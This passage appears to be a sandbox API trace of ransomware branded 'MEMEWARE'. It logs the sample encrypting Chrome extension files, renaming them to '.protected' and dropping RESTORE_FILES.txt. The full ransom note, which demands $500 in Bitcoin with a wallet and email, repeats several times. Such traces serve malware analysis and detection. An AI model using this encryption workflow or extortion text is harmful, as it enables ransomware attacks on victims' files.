E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.643] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.644] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.644] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.644] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.644] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.644] CloseHandle (hObject=0x164) returned 1 [0078.644] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0078.644] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0078.645] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0078.645] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 144 [0078.645] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0078.645] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0078.645] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*") returned 146 [0078.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.645] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.645] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.645] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.645] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.645] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.645] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\.") returned 146 [0078.645] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.645] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.645] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.645] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.645] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.645] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.645] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.645] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\..") returned 147 [0078.645] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.645] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.645] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.645] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.645] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.646] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.646] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.646] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.646] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.646] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.646] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.647] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.647] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.647] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.647] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.647] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.647] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.647] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.648] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.648] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.648] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.648] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.648] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.648] CloseHandle (hObject=0x168) returned 1 [0078.648] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0078.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0078.649] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.649] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.649] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0078.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.650] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.650] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.650] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.651] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.651] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.651] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.651] CloseHandle (hObject=0x164) returned 1 [0078.651] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0078.651] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0078.651] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned 144 [0078.651] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0078.651] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0078.651] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*") returned 146 [0078.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.651] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.651] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.651] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.652] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.652] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.652] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\.") returned 146 [0078.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.652] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.652] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.652] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.652] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.652] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.652] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\..") returned 147 [0078.652] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.652] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.652] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.652] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.652] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.652] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.652] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.652] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.653] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.653] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0078.653] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.653] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.654] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.654] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.654] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.654] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.654] CloseHandle (hObject=0x168) returned 1 [0078.654] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.protected") returned 168 [0078.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0078.655] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.655] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.655] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0078.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.656] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 